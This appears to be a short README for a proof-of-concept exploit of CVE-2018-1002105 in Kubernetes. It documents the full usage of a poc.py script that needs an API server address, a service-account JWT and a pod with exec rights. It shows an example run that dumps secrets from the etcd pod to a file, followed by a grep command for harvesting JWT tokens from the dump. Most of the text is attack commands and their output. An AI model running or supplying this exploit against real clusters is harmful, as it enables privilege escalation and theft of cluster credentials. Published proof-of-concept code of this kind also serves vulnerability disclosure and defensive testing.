Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires create and get privileges on pods and pods/exec. If you do not know what that means, this is probably not meant for you. :)
The current PoC dumps the secrets from the default etcd-kubernetes pod.
The PoC in action:
usage: poc.py [-h] --target TARGET --jwt TOKEN [--namespace NAMESPACE] --pod
POD [--privileged-namespace PNAMESPACE] [--privileged-pod PPOD]
[--container CONTAINER] [--command COMMAND]
[--filename FILENAME]
PoC for CVE-2018-1002105.
optional arguments:
-h, --help show this help message and exit
required arguments:
--target TARGET, -t TARGET
API server target:port
--jwt TOKEN, -j TOKEN
JWT token for service account
--namespace NAMESPACE, -n NAMESPACE
Namespace with exec access
--pod POD, -p POD Pod with exec access
optional arguments:
--privileged-namespace PNAMESPACE, -s PNAMESPACE
Target namespace
--privileged-pod PPOD, -e PPOD
Target privileged pod
--container CONTAINER, -c CONTAINER
Target container
--command COMMAND, -x COMMAND
Command to execute
--filename FILENAME, -f FILENAME
File to save output toExample:
$ ./poc.py -t 10.0.2.15:6443 --jwt [token] -p [pod] -f etcd.out
[*] Building pipe...
[+] Pipe opened :D
[*] Attempting code exec in pod
[*] Writing output to etcd.out ....
[+] Done!Check for tokens:
$ grep -air eyJ etcd.db